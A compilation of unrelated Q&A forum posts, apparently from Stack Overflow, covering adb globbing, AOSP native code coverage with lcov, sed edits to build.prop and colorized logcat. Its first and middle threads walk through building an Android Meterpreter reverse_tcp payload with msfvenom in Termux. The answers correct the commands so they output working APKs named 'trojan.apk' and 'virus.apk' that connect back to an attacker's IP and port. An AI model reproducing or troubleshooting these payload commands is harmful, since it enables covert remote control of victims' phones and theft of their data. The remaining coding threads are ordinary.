My command is:
./msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=443 -o > ~/storage/itechhacks.apk
But it wants below details:
[-] No platform was selected, choosing Msf::Module::Platform::Android
from the payload [-] No arch selected, selecting arch: dalvik from the
payload No encoder or badchars specified, outputting raw payload
Payload size: 10075 bytes
You can specify an architecture with -a or --arch, a platform with --platform, encoder with -e and badchars with -b.
You get more help with --help or -h
To list available arch, encoders... etc use --list arch, --list encoders ...etc
And you may want to specify the format with -f to get a .apk file and don't use > with -o
Depending on the msfvenom version the commands may differ slightly, use -h or --help to get the right syntax.
Here is a good description of msfvenom: https://www.offensive-security.com/metasploit-unleashed/Msfvenom/
Related
Using adb shell to run commands on an android device, I get different results when running ls with or without a wildcard ( globbing, i.e * ).
When running ls without a wildcard, the last path is displayed properly. When running ls with a wildcard, the path is displayed with an : in the end of it for some reason. The actual file does not have a : in its path.
My issue is specifically with the last file: /data/data/com.kauf.wrapmyFaceFunphotoeditor/files/DV-com.com.kauf.wrapmyFaceFunphotoeditor-2020-05-17-17-44-30-DEBUG.txt:
it has an : in the end which isn't supposed to be there
Why does using a wildcard in ls add characters to the result path?
Edit, environment details: Windows 10 / Android 7, the code is running on sh. I've ran adb shell to get to this command prompt, and doing it in one line (i.e adb shell su -c ls ...) returns similar results, same for adb shell command ...; also clarified the question.
As described in Why you shouldn't parse the output of ls, ls's behavior is not always well-defined. It's generally safer to use NULs (if you don't have any control or knowledge of filenames) or newlines (if you have reason to be certain that filenames can't contain them) to directly delimit a list of values emitted by the shell. Consider, then:
# output is separated by NULs, which cannot possibly exist in filenames
printf '%s\0' /data/data/com.kauf.wrapmyfacefunphotoeditor/files/DV-*
...or...
# output is separated by newlines; beware of a file named DV-evil<newline>something-else
printf '%s\n' /data/data/com.kauf.wrapmyfacefunphotoeditor/files/DV-*
Note that if you're passing this through extra unescaping layers, it may be necessary to double up your backslashes -- if you see literal 0s or ns separating filenames in your output, that's evidence of same.
Note also that if no matching files exist, a glob will expand to itself, so you can get an output that contains only the literal string /data/data/com.kauf.wrapmyfacefunphotoeditor/files/DV-*; in bash this can be suppressed with shopt -s nullglob, but with /bin/sh (particularly the minimal busybox versions more likely to be available on Android) this may not be available. One way to work around this is with code similar to the following:
# set list of files into $1, $2, etc
set -- /data/data/com.kauf.wrapmyfacefunphotoeditor/files/DV-*
# exit immediately if $1 does not exist
if [ "$#" -le 1 ] && [ ! -e "$1" ]; then
exit
fi
# otherwise, print the list in our desired format
printf '%s\0' "$#"
I'm trying to generate code coverage report for my native components with AOSP source code using soong build system.
I have extended aosp vhal but unit test cases are same as in below link.
http://androidxref.com/8.1.0_r33/xref/hardware/interfaces/automotive/vehicle/2.0/default/tests/
Tried adding below to cc_test, cc_binary in Android.bp
native_coverage : true,
cflags: [
"-g",
"-O0",
"-fprofile-arcs",
"-ftest-coverage",
],
ldflags : [
"-fprofile-arcs",
"-ftest-coverage",
],
Native binary unit-tests-coverage is generated in out/target/product but I can't find gcno intermediates for this.
Running below command gives me *.gcda files for each test files.
adb shell \
GCOV_PREFIX=/data/local/tmp \
GCOV_PREFIX_STRIP=`echo $ANDROID_BUILD_TOP | grep -o / | wc -l` \
/data/local/tmp/unit-tests-coverage
I have tried below links but not sure how to proceed :(
http://logan.tw/posts/2015/04/28/check-code-coverage-with-clang-and-lcov/
https://android.googlesource.com/platform/bionic.git/+/master-soong
https://android.googlesource.com/platform/build/soong/+/581341d%5E%21/
https://android.googlesource.com/platform/external/e2fsprogs/+/fedfb27%5E%21/
https://android.googlesource.com/platform/development/+/master/scripts/acov#23
http://androidxref.com/9.0.0_r3/xref/bionic/README.md#293
I'm not sure if google's vts framework can be used here to generate native code coverage.
https://codelabs.developers.google.com/codelabs/android-vts-8/#6
"gcnodir" is generated but not sure how to make use of it.
/coverage/data/nativetest64/vehicle-unit-tests-coverage/unit-tests-coverage.gcnodir
Posting answer to my question for other users on SO.
Install coverage tool :
sudo apt-get install lcov (This should install lcov-1.12)
sudo apt-get install gcc-4.6 (Clang generates .gcno approximately equal to gcc 4.2 that aren't compatible
with gcov-4.8. Installing gcc-4.6 to get gcov-4.6 and invoking lcov with '--gcov-tool /usr/bin/gcov-4.6')
Download LLVM 3.8 for llvm-cov to work : http://releases.llvm.org/download.html
All native unit test cases i.e instrumented binary needs to be executed on target. To build and emit clang's instrumentation based profiling. Example: http://androidxref.com/9.0.0_r3/xref/hardware/interfaces/automotive/vehicle/2.0/default/Android.bp#82 (Renamed to vehicle-manager-unit-test for shorter name)
export NATIVE_COVERAGE=true
Add native_coverage: true to test module in Android.bp
Go to: module-name/test
Use mm or make command to build native binary
Ex: For hardware/interfaces/automotive/vehicle/2.0/default/tests/ :
mma or make vehicle-manager-unit-test -j32
Copy coverage enabled instrumented binary to target
adb push out/target/product/product_name/data/nativetest64/vendor/vehicle-manager-unit-test /data/nativetest64/vehicle-manager-unit-test
adb shell chmod +x /data/nativetest64/vehicle-manager-unit-test
Run test cases and generate .gcda files
adb shell \
GCOV_PREFIX=/data/local/tmp \
GCOV_PREFIX_STRIP=echo $ANDROID_BUILD_TOP | grep -o / | wc -l \
/data/nativetest64/vehicle-manager-unit-test
adb shell find -iname *.gcda
adb pull /data/local/tmp/proc/self/cwd/out/soong/.intermediates/hardware/interfaces/automotive/vehicle/2.0/default/vehicle-manager-unit-test/android_x86_64_silvermont_vendor_cov/obj/hardware/interfaces/automotive/vehicle/2.0/default/tests/ .(Destination folder)
Extract GCNO files from GCNODIR (archive file generated at
out/overage/data/nativetest64/vendor/vehicle-manager-unit-test ) to
same folder with GCDA files
llvm-cov gcov -f -b *.gcda (https://llvm.org/docs/CommandGuide/llvm-cov.html )
lcov --directory . --base-directory . --gcov-tool /usr/bin/gcov-4.6 --capture -o cov.info (http://ltp.sourceforge.net/coverage/lcov.php)
genhtml cov.info -o output
Here's the script which wraps all these commands:
https://gist.github.com/pankajgangwar/f070b8b54e83543f8e3638dcd2cae1b8
here it is explaned how to generate coverage reports, which do require GTest:
these flags enable the generation of test coverage: -fprofile-arcs -ftest-coverage
then one has to use gcov: gcov main_test.cpp
which's output then can be passed on to lcov (for reference):
$ lcov --coverage --directory . --output-file main_coverage.info
from which one can generate an lcov coverage report in HTML format:
$ genhtml main_coverage.info --output-directory out
these .gcda files in .gcnodir are gcov data files. gcov also has an output option --json-format, which might come handy when wanting to consume the coverage data with a web-service.
one of the examples from the links you've provided can be used to generate it for a whole project:
Collect the code coverage results:
$ lcov --directory . \
--base-directory . \
--gcov-tool gcov.sh \
--capture -o cov.info
Generate HTML files:
$ genhtml cov.info -o output
where the only difference is, that the wrapper script would need to be adjusted to call gcov. probably one could even omit the wrapper passed with option --gcov-tool, since it should be directly called.
since one can only prepare the coverage report by adding the compiler flags, the gcov and lcov commands should be setup as post-build script, so that they would automatically generate the report.
When I make a payload with this command in my termux app
. /msfvenom -p android/meterpreter/reverse_tcp lhost=IP ADDRESS lport=3333 -o /sdcard/FILE NAME/test.apk
Then it is showing me
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9435 bytes
Error: Permission denied # rb_sysopen - /sdcard/apk_payload/hack.apk
How to solve it please please 🙏 please help me
First of all, sorry for my bad english.
It looks like your problem is the path, the sdcard path is ~/storage
And inside, you just can access some folders, in my case are dcim, downloads, movies, music, pictures & shared
I've decided to put it in downloads, so the path should look like this:
~/storage/downloads/trojan.apk
The final code should be like this:
./msfvenom -p android/meterpreter/reverse_tcp LHOST=Your Ip LPORT=Your Port -o ~/storage/downloads/trojan.apk
First if msfvenom is in your usr/local/bin folder you should not need ./msfvenom just start with msfvenom.
Second the -o option is used when the -x option is used otherwise you should not use it.
Your command should look like this
msfvenom -p android/meterpreter/reverse_tcp LHOST=your ip LPORT=your port R > /root/what-ever-path-you-want/app-name.apk
Example:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.19 LPORT=4444 R > /root/Documents/virus.apk
I need to modify a number into a file using a bash script
I want to remove a line that contains dalvik.vm.heapsize=256 and replace it with a new line that contains dalvik.vm.heapsize=512. I not know the line number and 256 is an ipotetic value. How I can build a script that perform this action??
Use the sed command:
sed -i -e 's/^\(dalvik.vm.heapsize=\).*/\1512/' build.prop
The command searches for a line starting with dalvik.vm.heapsize=, then replaces the part after = with 512. The left part is captured using the regular expression group, and \1 in the replacement part (\1512) refers to this group. The -i option instructs to replace in-place. Refer to info sed for details.
Here is a more advanced example taking into account possible leading spaces/tabs and making the match stricter by means of the regular expression lists:
sed -i -e 's/^\([ \t]*dalvik.vm.heapsize=\)[0-9]\+/\1512/' build.prop
Perl is more flexible. I prefer to use it for more complicated tasks. There is no such simple way as sed's -i option for Perl, however; but you can simply use the shell redirection, e.g.:
cat build.prop | \
perl -n -e 's/^([\t\s]*dalvik.vm.heapsize=)\d+/${1}512/; print' > build.prop
The Logcat in Eclipse has colors for errors, warning, debug, ...
How can I do to get the same result on Linux (Ubuntu) when I run the command 'adb -e logcat' in a terminal to get it colored?
adb logcat -v color
from developer.android.com
Link with script
I think it will be useful for you and you can change script by yourself;)
This is my view of "colorizing" the logcat:
https://bitbucket.org/brunobraga/logcat-colorize
My favourite is pidcat, maintained by Jake Wharton based off of Jeff Sharkey's script (mentioned by Yaroslav Boichuk).
I have also used logcat-color, maintained by Marshall Culpepper, (also based off of Jeff's script) which allows you to create profiles you can activate (log per task, or per application, etc).
I have preferred pidcat because at the time logcat-color wouldn't filter by package name, and I never went back to try again once it was added. Seems to be reasonably popular still as well.
And yet another script:
#!/bin/sh
while :; do
adb $# logcat | sed \
-e 's:^V/:\x00\x1b[0;35m:g' \
-e 's:^D/:\x00\x1b[0;36m:g' \
-e 's:^I/:\x00\x1b[0;32m:g' \
-e 's:^W/:\x00\x1b[0;33m:g' \
-e 's:^E/:\x00\x1b[0;31m:g' \
-e 's:^F/:\x00\x1b[0;31m:g' \
-e '/Unexpected value from nativeGetEnabledTags/d' \
-e '/The application may be/d'
sleep 1
done
If you use Python, PyLogAnalyser can filter, colorize and analyse all type of logs in Linux, Windows and Mac (and Cygwin).
You can install it directly from PyPI:
python -m pip install pyloganalyser
And call it in order to print the log for the standard output (also, for text or HTML output):
adb logcat -v threadtime | python -m loganalyser --stdin --stdout -c Android_logcat_threadtime.conf
The file 'Android_logcat_threadtime.conf' is included in the module directory. So the actual invocation could be:
CONFPATH="$(python -c 'import loganalyser;print loganalyser.__file__.replace("/__init__.pyc","")')";
adb logcat -v threadtime | python -m loganalyser --stdin --stdout -c "$CONFPATH"/android/Android_logcat_threadtime.conf
Website: http://pyloganalyser.sourceforge.net
Have a try with lnav , add logcat config from here